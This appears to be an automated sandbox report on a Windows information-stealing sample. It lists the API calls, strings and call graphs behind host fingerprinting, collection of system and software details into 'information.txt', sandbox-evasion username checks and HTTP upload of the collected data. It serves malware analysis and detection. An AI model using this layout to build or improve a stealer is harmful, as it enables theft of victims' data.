                                                                                                                                                                                      • memcpy.MSVCRT(?), ref: 00344D5F
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?), ref: 00344D74
                                                                                                                                                                                      • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00344D88
                                                                                                                                                                                      • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00344DAF
                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00344E25
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00344E3D
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00344E48
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00344E58
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$OpenRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                                                                                                                      • String ID: ------$"$--$------$ERROR$block$build_id$file_data$f5
                                                                                                                                                                                      • API String ID: 1093660128-2952223706
                                                                                                                                                                                      • Opcode ID: 1a5bdb4bd38bb824b55330405b55fe0e6082b8823bdbf9c7a88b54f3bb6eef1f
                                                                                                                                                                                      • Instruction ID: 8e2087150a53dc4e166b7f63e40979a2f6c9f7e55c079e5ce096aa79f35b2791
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a5bdb4bd38bb824b55330405b55fe0e6082b8823bdbf9c7a88b54f3bb6eef1f
                                                                                                                                                                                      • Instruction Fuzzy Hash: ED329A72800009ABDB06EBE4DC96CEEB7BCBF25304F554165F512AA091EF34BB49CB94

Control-flow Graph

Control-flow graph of function starting at 355bca (graph data omitted; the graph shows repeated LoadLibraryA and GetProcAddress call sites)
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2238633743-0
                                                                                                                                                                                      • Opcode ID: c5327fa134be20409fab16c2b574b6bcc428547e37753220b2dafe3825c1b68b
                                                                                                                                                                                      • Instruction ID: 55ff34f7a2445af246ac935d4fd5f86b9473609eaf3f17190a6495ee306ba725
                                                                                                                                                                                      • Opcode Fuzzy Hash: c5327fa134be20409fab16c2b574b6bcc428547e37753220b2dafe3825c1b68b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8171ED75509601EFEB02DFE0EE1996E3FB6F74838134484A6E90A91A30D7B25992EF50

Control-flow Graph

Control-flow graph of function 352885-3532cc (graph data omitted; the graph shows GetCurrentProcessId, lstrlenA and repeated string-helper subcalls)
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E851: GetProcessHeap.KERNEL32(00000000,00000104,003613FC), ref: 0034E85F
                                                                                                                                                                                        • Part of subcall function 0034E851: HeapAlloc.KERNEL32(00000000), ref: 0034E866
                                                                                                                                                                                        • Part of subcall function 0034E851: GetLocalTime.KERNEL32(?), ref: 0034E872
                                                                                                                                                                                        • Part of subcall function 0034E851: wsprintfA.USER32 ref: 0034E89D
                                                                                                                                                                                        • Part of subcall function 0034EF2D: memset.MSVCRT ref: 0034EF53
                                                                                                                                                                                        • Part of subcall function 0034EF2D: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 0034EF6F
                                                                                                                                                                                        • Part of subcall function 0034EF2D: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?), ref: 0034EF8E
                                                                                                                                                                                        • Part of subcall function 0034EF2D: RegCloseKey.ADVAPI32(?), ref: 0034EF97
                                                                                                                                                                                        • Part of subcall function 0034EF2D: CharToOemA.USER32(?,?), ref: 0034EFAB
                                                                                                                                                                                        • Part of subcall function 0034EFBA: GetCurrentHwProfileA.ADVAPI32(?), ref: 0034EFCA
                                                                                                                                                                                        • Part of subcall function 0034EFBA: memset.MSVCRT ref: 0034EFF5
                                                                                                                                                                                        • Part of subcall function 0034EFBA: lstrcatA.KERNEL32(?,00000000), ref: 0034F025
                                                                                                                                                                                        • Part of subcall function 0034EFBA: lstrcatA.KERNEL32(?,003618AC), ref: 0034F03F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034F078: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00361ECC), ref: 0034F095
                                                                                                                                                                                        • Part of subcall function 0034F078: GetVolumeInformationA.KERNEL32(nK5,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0034F0C7
                                                                                                                                                                                        • Part of subcall function 0034F078: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0034F10A
                                                                                                                                                                                        • Part of subcall function 0034F078: HeapAlloc.KERNEL32(00000000), ref: 0034F111
                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00361678,00000000,?,00000000,00000000,?,HWID: ,00000000,?,003613FC,00000000), ref: 00352AED
                                                                                                                                                                                        • Part of subcall function 0034FB18: OpenProcess.KERNEL32(00000410,00000000,?,003613FC), ref: 0034FB2C
                                                                                                                                                                                        • Part of subcall function 0034FB18: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0034FB47
                                                                                                                                                                                        • Part of subcall function 0034FB18: CloseHandle.KERNEL32(00000000), ref: 0034FB4E
                                                                                                                                                                                        • Part of subcall function 0034F1BE: GetProcessHeap.KERNEL32(00000000,00000104,00361678,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?,Work Dir: In memory), ref: 0034F1D2
                                                                                                                                                                                        • Part of subcall function 0034F1BE: HeapAlloc.KERNEL32(00000000,?,?,?,00352BAA,00000000,?,Windows: ,00000000,?,00361678,00000000,?,Work Dir: In memory,00000000,?), ref: 0034F1D9
                                                                                                                                                                                        • Part of subcall function 0034F2FF: _EH_prolog.MSVCRT ref: 0034F304
                                                                                                                                                                                        • Part of subcall function 0034F2FF: CoInitializeEx.OLE32(00000000,00000000,00361678,003613FC,00361ECC), ref: 0034F319
                                                                                                                                                                                        • Part of subcall function 0034F2FF: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0034F32A
                                                                                                                                                                                        • Part of subcall function 0034F2FF: CoCreateInstance.OLE32(003629E0,00000000,00000001,00362910,?), ref: 0034F344
                                                                                                                                                                                        • Part of subcall function 0034F2FF: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0034F37A
                                                                                                                                                                                        • Part of subcall function 0034F2FF: VariantInit.OLEAUT32(?), ref: 0034F3D5
                                                                                                                                                                                        • Part of subcall function 0034F493: _EH_prolog.MSVCRT ref: 0034F498
                                                                                                                                                                                        • Part of subcall function 0034F493: CoInitializeEx.OLE32(00000000,00000000,00361678,003613FC,00361ECC), ref: 0034F4AD
                                                                                                                                                                                        • Part of subcall function 0034F493: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0034F4BE
                                                                                                                                                                                        • Part of subcall function 0034F493: CoCreateInstance.OLE32(003629E0,00000000,00000001,00362910,?), ref: 0034F4D8
                                                                                                                                                                                        • Part of subcall function 0034F493: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0034F50E
                                                                                                                                                                                        • Part of subcall function 0034F493: VariantInit.OLEAUT32(?), ref: 0034F55D
                                                                                                                                                                                        • Part of subcall function 0034E816: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E822
                                                                                                                                                                                        • Part of subcall function 0034E816: HeapAlloc.KERNEL32(00000000,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E829
                                                                                                                                                                                        • Part of subcall function 0034E816: GetComputerNameA.KERNEL32(00000000,?), ref: 0034E83D
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F0
                                                                                                                                                                                        • Part of subcall function 0034E7E4: HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00341063,JohnDoe,003555D9), ref: 0034E7F7
                                                                                                                                                                                        • Part of subcall function 0034E7E4: GetUserNameA.ADVAPI32(00000000,?), ref: 0034E80B
                                                                                                                                                                                        • Part of subcall function 0034EEBB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00352DB7,?,00000000,?,Display Resolution: ,00000000,?,003613FC,00000000,?,00000000,00000000), ref: 0034EEFA
                                                                                                                                                                                        • Part of subcall function 0034EEBB: HeapAlloc.KERNEL32(00000000,?,?,00352DB7,?,00000000,?,Display Resolution: ,00000000,?,003613FC,00000000,?,00000000,00000000,?), ref: 0034EF01
                                                                                                                                                                                        • Part of subcall function 0034EEBB: wsprintfA.USER32 ref: 0034EF13
                                                                                                                                                                                        • Part of subcall function 0034E8FE: GetKeyboardLayoutList.USER32(00000000,00000000,0035E266,00361678,003613FC,00361ECC), ref: 0034E91E
                                                                                                                                                                                        • Part of subcall function 0034E8FE: LocalAlloc.KERNEL32(00000040,00000000), ref: 0034E92C
                                                                                                                                                                                        • Part of subcall function 0034E8FE: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0034E936
                                                                                                                                                                                        • Part of subcall function 0034E8FE: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0034E95B
                                                                                                                                                                                        • Part of subcall function 0034E8FE: LocalFree.KERNEL32(00000000), ref: 0034E9DB
                                                                                                                                                                                        • Part of subcall function 0034E8AB: GetProcessHeap.KERNEL32(00000000,00000104,003613FC), ref: 0034E8BC
                                                                                                                                                                                        • Part of subcall function 0034E8AB: HeapAlloc.KERNEL32(00000000), ref: 0034E8C3
                                                                                                                                                                                        • Part of subcall function 0034E8AB: GetTimeZoneInformation.KERNEL32(?), ref: 0034E8D2
                                                                                                                                                                                        • Part of subcall function 0034E8AB: wsprintfA.USER32 ref: 0034E8F0
                                                                                                                                                                                        • Part of subcall function 0034E9E9: GetProcessHeap.KERNEL32(00000000,00000104,00361678,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678), ref: 0034E9FD
                                                                                                                                                                                        • Part of subcall function 0034E9E9: HeapAlloc.KERNEL32(00000000,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678,00000000,?), ref: 0034EA04
                                                                                                                                                                                        • Part of subcall function 0034E9E9: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0034EA22
                                                                                                                                                                                        • Part of subcall function 0034E9E9: RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0034EA3E
                                                                                                                                                                                        • Part of subcall function 0034E9E9: RegCloseKey.ADVAPI32(?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678,00000000,?), ref: 0034EA47
                                                                                                                                                                                        • Part of subcall function 0034EA85: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0034EAD8
                                                                                                                                                                                        • Part of subcall function 0034EA85: wsprintfA.USER32 ref: 0034EB1E
                                                                                                                                                                                        • Part of subcall function 0034EA52: GetSystemInfo.KERNEL32(?), ref: 0034EA5F
                                                                                                                                                                                        • Part of subcall function 0034EA52: wsprintfA.USER32 ref: 0034EA74
                                                                                                                                                                                        • Part of subcall function 0034EB44: GetProcessHeap.KERNEL32(00000000,00000104,00361678), ref: 0034EB52
                                                                                                                                                                                        • Part of subcall function 0034EB44: HeapAlloc.KERNEL32(00000000), ref: 0034EB59
                                                                                                                                                                                        • Part of subcall function 0034EB44: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0034EB79
                                                                                                                                                                                        • Part of subcall function 0034EB44: wsprintfA.USER32 ref: 0034EB9F
                                                                                                                                                                                        • Part of subcall function 0034EE16: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0035E266,00361678,003613FC), ref: 0034EE3E
                                                                                                                                                                                        • Part of subcall function 0034EE16: Process32First.KERNEL32(00000000,?), ref: 0034EE4E
                                                                                                                                                                                        • Part of subcall function 0034EE16: Process32Next.KERNEL32(00000000,?), ref: 0034EEA4
                                                                                                                                                                                        • Part of subcall function 0034EE16: CloseHandle.KERNEL32(00000000), ref: 0034EEAF
                                                                                                                                                                                        • Part of subcall function 0034EC0C: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0035E266,003613FC,00361ECC), ref: 0034EC4A
                                                                                                                                                                                        • Part of subcall function 0034EC0C: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00361678), ref: 0034EC8E
                                                                                                                                                                                        • Part of subcall function 0034EC0C: wsprintfA.USER32 ref: 0034ECB8
                                                                                                                                                                                        • Part of subcall function 0034EC0C: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0034ECD1
                                                                                                                                                                                        • Part of subcall function 0034EC0C: RegQueryValueExA.KERNEL32(?,00000000,?,?,?), ref: 0034ECFB
                                                                                                                                                                                        • Part of subcall function 0034EC0C: lstrlenA.KERNEL32(?), ref: 0034ED10
                                                                                                                                                                                        • Part of subcall function 0034EC0C: RegQueryValueExA.KERNEL32(?,00000000,?,?,?,00000000,?,?,00000000,?,003613FC), ref: 0034ED81
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,?,00361678,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00361678), ref: 00353275
                                                                                                                                                                                        • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
                                                                                                                                                                                        • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
                                                                                                                                                                                        • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$Process$Alloc$wsprintf$Open$CloseCreateInitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCurrentH_prologHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantmemset$CharComputerDirectoryEnumFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                      • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                      • API String ID: 2383149703-1014693891
                                                                                                                                                                                      • Opcode ID: 7b5b6e283fec8a289cf2752d93332048277a54832f32980589634b14296a72f0
                                                                                                                                                                                      • Instruction ID: 502c4034f73c609f7939477b495ba3f83acf85759fb6ba8de6b3ef5f1fafeff3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b5b6e283fec8a289cf2752d93332048277a54832f32980589634b14296a72f0
                                                                                                                                                                                      • Instruction Fuzzy Hash: FB62FD72840008AADB07FB94D992CDEB3BCBE25344F5542A6F512BE091EF357F09CA65

Control-flow Graph

control_flow_graph 2182 345ae7-345b81 call 34e5b4 call 343ef3 call 34e57d * 5 call 34e766 InternetOpenA StrCmpCA 2199 345b86-345b89 2182->2199 2200 345b83 2182->2200 2201 34611c-346142 InternetCloseHandle call 34e766 call 346a41 2199->2201 2202 345b8f-345cc7 call 34f6b1 call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 2 InternetConnectA 2199->2202 2200->2199 2211 346144-346165 call 34e5f1 call 34e6d4 call 34e63b call 34e5e8 2201->2211 2212 34616a-3461b6 call 34f5e9 * 2 call 34e5e8 * 4 call 341301 call 34e5e8 2201->2212 2202->2201 2282 345ccd-345cff HttpOpenRequestA 2202->2282 2211->2212 2283 345d05-345d09 2282->2283 2284 346113-346116 InternetCloseHandle 2282->2284 2285 345d21-3460bb call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 342033 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e766 lstrlenA call 34e766 lstrlenA GetProcessHeap HeapAlloc call 34e766 lstrlenA call 34e766 memcpy call 34e766 lstrlenA call 34e766 * 2 lstrlenA memcpy call 34e766 lstrlenA call 34e766 HttpSendRequestA 2283->2285 2286 345d0b-345d1b InternetSetOptionA 2283->2286 2284->2201 2445 3460f0-346105 InternetReadFile 2285->2445 2286->2285 2446 346107-34610e InternetCloseHandle 2445->2446 2447 3460bd-3460c2 2445->2447 2446->2284 2447->2446 2448 3460c4-3460eb call 34e6d4 call 34e63b call 34e5e8 2447->2448 2448->2445
APIs
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00361C14,ERROR), ref: 00343F1F
  • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00361C14,ERROR), ref: 00343F28
  • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,00361C14,ERROR), ref: 00343F31
  • Part of subcall function 00343EF3: lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
  • Part of subcall function 00343EF3: InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00345B61
• StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00361ECC), ref: 00345B79
• InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345CBA
• HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00345CF4
• lstrlenA.KERNEL32(00000000,00000000,00354BD1,?,00000000,00354BD1,",00000000,00354BD1,mode,00000000,00354BD1,00000000,00354BD1,00361348,00000000), ref: 00346011
• lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00361ECC), ref: 00346022
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00361ECC), ref: 0034602D
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00361ECC), ref: 00346034
• lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00361ECC), ref: 00346045
• memcpy.MSVCRT(00000000,00000000,00000000,?,?,?,?,?,?,00361ECC), ref: 00346056
• lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00361ECC), ref: 00346067
• lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00361ECC), ref: 00346080
• memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,00361ECC), ref: 00346089
• lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00361ECC), ref: 0034609C
• HttpSendRequestA.WININET(?,00000000,00000000), ref: 003460B0
• InternetReadFile.WININET(?,?,000000C7,00000000), ref: 003460FD
• InternetCloseHandle.WININET(?), ref: 00346108
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00345D1B
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
• InternetCloseHandle.WININET(?), ref: 00346116
• InternetCloseHandle.WININET(?), ref: 0034611F
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
